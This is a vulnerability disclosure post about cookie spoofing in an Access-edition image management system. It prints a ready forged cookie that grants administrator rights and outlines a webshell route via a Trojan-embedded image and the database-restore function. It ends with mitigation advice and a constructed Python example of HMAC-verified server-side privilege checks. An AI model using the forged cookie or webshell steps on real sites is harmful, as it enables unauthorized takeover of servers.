About a year ago, I discovered a cookie spoofing vulnerability in the Access edition of the image management system: any user can modify the cookie to gain administrator privileges.
In February June this year, I sent an email to IOT platform about the vulnerability. They replied as follows:
"Hello, thank you for reminding me!
Wish you a happy and healthy family!"
Today, I downloaded the latest version (naipin_t_20100906_acc.rar) for testing and found that this vulnerability still exists.
Since the official team does not pay much attention to it, I will release it.
Netpic=ArticleFlag=0&UserName=redice&GroupID=1&Comment=1&Source=0&Article=1&PicFlag=0&Group=%C6%D5%CD%A8%BB%E1%D4%B1&Vote=1&UserId=77&Self=1&View=1&Manage=0&Upload=1&ViewHide=0&Setting=1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1; ASPSESSIONIDCABRBATD=MDCHGDDALJGALHFHOIFLFJLL
Using the cookie above, you can also get administrator privileges without logging on...
Feasibility of obtaining a webshell:
This method can be used if the database file has an .asp suffix. Use the user image upload to upload an image that contains a one-line Trojan (embedded with edjpgcom).
Then go to the admin backend and use the database restoration function to restore the uploaded image as the database.
Security Protection:
For more information about cookies, see the Red/Black Alliance article channel.
Temporarily disable the database restoration function and wait for the official upgrade.
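The underlying flaw is that the privilege decision is read from a cookie the client controls. The following is an added example, not code from the image management system or from the original post: it contrasts that pattern with a check that authenticates the identity claim with an HMAC and reads privileges from a server-side record. The key, the user table, the `Sig` field and the assumption that group id 1 carries administrator rights are all constructed for the illustration.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, urlencode

SERVER_KEY = b"constructed-demo-key"   # assumption: secret known only to the server
ADMIN_GROUP = "1"                      # assumption: group id that carries admin rights
USERS = {                              # constructed server-side records
    "1": {"UserName": "admin", "GroupID": "1"},
    "77": {"UserName": "redice", "GroupID": "3"},
}


def parse_cookie(value):
    """Split a Netpic-style sub-key cookie (k=v&k=v) into a dict."""
    return dict(parse_qsl(value, keep_blank_values=True))


def is_admin_vulnerable(cookie):
    """Flawed pattern: the privilege comes straight from client-supplied data."""
    return parse_cookie(cookie).get("GroupID") == ADMIN_GROUP


def _mac(user_id):
    """HMAC-SHA256 over the identity claim, keyed with the server secret."""
    return hmac.new(SERVER_KEY, user_id.encode(), hashlib.sha256).hexdigest()


def issue_cookie(user_id):
    """Issued after a successful login: identity plus MAC, no privilege fields."""
    return urlencode({"UserId": user_id, "Sig": _mac(user_id)})


def is_admin_hardened(cookie):
    """Verify the MAC first, then look the privilege up on the server side."""
    fields = parse_cookie(cookie)
    user_id, sig = fields.get("UserId", ""), fields.get("Sig", "")
    if not hmac.compare_digest(sig.encode(), _mac(user_id).encode()):
        return False                   # modified or hand-written cookie
    record = USERS.get(user_id)
    return record is not None and record["GroupID"] == ADMIN_GROUP


if __name__ == "__main__":
    edited = "UserName=redice&GroupID=1&UserId=77&Manage=0"  # constructed sample
    print("trusting the cookie:", is_admin_vulnerable(edited))   # True
    print("server-side check:  ", is_admin_hardened(edited))     # False
```

A production version would also bind the MAC to a session identifier and an expiry time so that a captured cookie cannot be replayed indefinitely.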